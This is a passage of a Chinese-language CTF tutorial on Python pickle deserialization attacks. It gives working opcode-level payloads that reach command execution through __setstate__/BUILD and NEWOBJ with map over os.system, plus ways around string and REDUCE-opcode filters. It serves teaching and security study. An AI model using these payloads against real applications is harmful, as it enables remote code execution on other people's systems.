具体的利用流程如下:
- 导入一个已有的类并且将其
__setstate__
设置为危险函数,例如 os.system - 实例化这个类
- 向栈上压入参数,然后执行 BUILD 操作触发 load_build 中的方法调用。
下面我们一步一步来构造 payload:
测试环境为一个 db.py,其中包含了一个 User 类。如下的代码取自 ångstromCTF 2021 ekans
import pickle
import base64
import io
import os
POKEMON = {id: (os.environ.get('FLAG', 'flag{TEST}') if id == 1337 else 'EKANS') for id in range(2000)}
USERS = {'guest': 'guest', 'PokeMaster3000': os.environ.get('ADMIN_PASSWORD', '<secret>')}
ADMINS = ['PokeMaster3000']
class User:
admin = False
def __init__(self, username='guest', password='guest'):
self.username = username
self.password = password
if username in ADMINS: self.admin = True
def is_admin(self): return self.authenticated() and self.admin
def authenticated(self): return self.password == USERS.get(self.username)
class SafeUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module == "db" and name == "User": return User
raise pickle.UnpicklingError(f"HACKING DETECTED")
load_user = lambda request: SafeUnpickler(io.BytesIO(base64.b64decode(request.cookies['user'].encode('utf-8')))).load()
第一步:修改已有类的 __setstate__
在前面利用代码对象篡改函数时,我们使用如下的 payload 对某个类的属性进行篡改:
p = GLOBAL + b'__main__\nSnakeWindow\n' + \
NONE + \
MARK + \
UNICODE + b'__code__\n' + \
UNICODE + b'bbbb\n' + \
DICT + \
TUPLE2 + \
BUILD + \
STOP
同样的,这里可以编写类似的 payload 修改 db.User 的 __setstate__
属性。
p = PROTO + b'\x04' + \
GLOBAL + b'db\nUser\n' + \
NONE + \
MARK + \
UNICODE + b'__setstate__\n' + \
GLOBAL + b'os\nsystem\n' + \
DICT + \
TUPLE2 + \
BUILD + \
STOP
# >>> a
# <class 'db.User'>
# >>> a.__setstate__
# <built-in function system>
第二步:实例化这个类
实例化这个类我们可以使用 OBJ 操作码,注意需要在前面加入 MAKR
p = PROTO + b'\x04' + \
MARK + \
GLOBAL + b'db\nUser\n' + \
NONE + \
MARK + \
UNICODE + b'__setstate__\n' + \
GLOBAL + b'os\nsystem\n' + \
DICT + \
TUPLE2 + \
BUILD + \
OBJ + \
# >>> a
# <db.User object at 0x7f0a618bf790>
这样我们就得到了这个类的实例。
第三步:压入参数并执行 BUILD
构造好对象之后,我们只需要再往栈上压入参数,如 “id”, 然后再次触发 load_build 即可。下面是最终的 payload:
p = PROTO + b'\x04' + \
MARK + \
GLOBAL + b'db\nUser\n' + \
NONE + \
MARK + \
UNICODE + b'__setstate__\n' + \
GLOBAL + b'os\nsystem\n' + \
DICT + \
TUPLE2 + \
BUILD + \
OBJ + \
UNICODE + b'id\n' + \
BUILD + \
STOP
可以发现只要进行了反序列化,就会触发命令执行。
利用 load_newobj RCE
上面的 load_build 方法存在一个缺陷,必须要能够先实例化一个类才可以进行利用,假如环境中没有这样的一个类呢?为了解决这个问题,可以利用 load_newobj 函数。
load_newobj 函数对应的是 NEWOBJ 操作码的行为, NEWOBJ 操作码的值为 b'\x81'
, 这个操作码会根据提供的参数,调用类的 __new__
方法,函数内容如下:
def load_newobj(self):
args = self.stack.pop()
cls = self.stack.pop()
obj = cls.__new__(cls, *args)
self.append(obj)
dispatch[NEWOBJ[0]] = load_newobj
可以看到 cls 和 args
都是可控的,如果某个类的 __new__
方法可以执行任意命令,那么就可以配合 NEWOBJ 操作码在反序列化使达成 RCE。美团CTF 2022 ezpickle 和 蓝帽杯2022 file_session 这两道题目的解题思路就是利用了这个点。
利用 payload 如下:bytes 类和 tuple 类的 __new__
方法可以接收一个迭代器对象。若此时我们使用 map 去构造一个绑定了危险函数的迭代器,在调用__new__
时,就会触发命令执行。
bytes.__new__(bytes, map.__new__(map, eval, ['print(1)']))
bytes.__new__(bytes, map.__new__(map, os.system, ['ls']))
通过上面的方法可以在仅使用内置类的情况下完成 RCE。
a = map(os.system,['ls'])
builtins 中一共有三个类可以满足这个条件:bytes、tuple、frozenset
>>> a = map(os.system,['ls'])
>>> frozenset.__new__(frozenset,a)
>>> a = map(os.system,['ls'])
>>> bytes.__new__(bytes,a)
>>> a = map(os.system,['ls'])
>>> tuple.__new__(tuple,a)
后面的 map 也可以采用 __new__
来构建:
bytes.__new__(bytes,map.__new__(map,os.system,'whoami'))
接着就可以构造反序列化 payload:
首先我们需要构建一个 map 对象。
p = PROTO + b'\x02' + \
GLOBAL + b'builtins\nmap\n' + \
GLOBAL + b'os\nsystem\n' + \
MARK + \
UNICODE + b'whoami\n' + \
LIST + \
TUPLE2 + \
NEWOBJ + \
STOP
pickletools.dis(p)
a = loads(p)
print(a)
# <map object at 0x7fc616fe7310>
获取到这个 map 之后,导入 bytes,然后调用 NEWOBJ:
p = PROTO + b'\x02' + \
GLOBAL + b'builtins\nbytes\n' + \
GLOBAL + b'builtins\nmap\n' + \
GLOBAL + b'os\nsystem\n' + \
MARK + \
UNICODE + b'whoami\n' + \
LIST + \
TUPLE2 + \
NEWOBJ + \
TUPLE1 + \
NEWOBJ + \
STOP
绕过操作码过滤
绕过字符串过滤
如果某些题目需要覆盖特定的变量,但是将变量名进行了过滤,例如要覆盖 __main__
secret.key
. 但是将 key 这个字符串进行了过滤。那么我们可以通过字符串变换来绕过。
V 操作码
V 操作码表示 unicode 编码
c__main__
secret
(V\u006bey #key
S'asd'
db.
十六进制
十六进制也可以绕过
c__main__
secret
(S'\x6bey' #key
S'asd'
db.
绕过 R 操作码过滤
除了 REDUCE 操作码可以执行函数之外,还有其他两种执行函数的方法。
- 通过 b’i’ 调用:
INST('os', 'system', 'whoami')
- 通过 b’c’ 与 b’o’ 调用:
OBJ(GLOBAL('os', 'system'), 'whoami')
下面是 Code-Breaking 那道题原本的 payload 为:
getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()
__builtins__ = dict_get(builtins, '__builtins__')
eval = getattr(__builtins__, 'eval')
eval('__import__("os").system("whoami")')
return
转化为 OBJ 的构造方式:
getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = OBJ(getattr, dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = OBJ(globals)
__builtins__ = OBJ(dict_get, builtins, '__builtins__')
eval = OBJ(getattr,__builtins__, 'eval')
return OBJ(eval,'__import__("os").system("whoami")')
b'cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0(g0\ng1\nS\'get\'\nop2\n0cbuiltins\nglobals\np3\n0(g3\nop4\n0(g2\ng4\nS\'__builtins__\'\nop5\n0(g0\ng5\nS\'eval\'\nop6\n0(g6\nS\'__import__("os").system("whoami")\'\no.'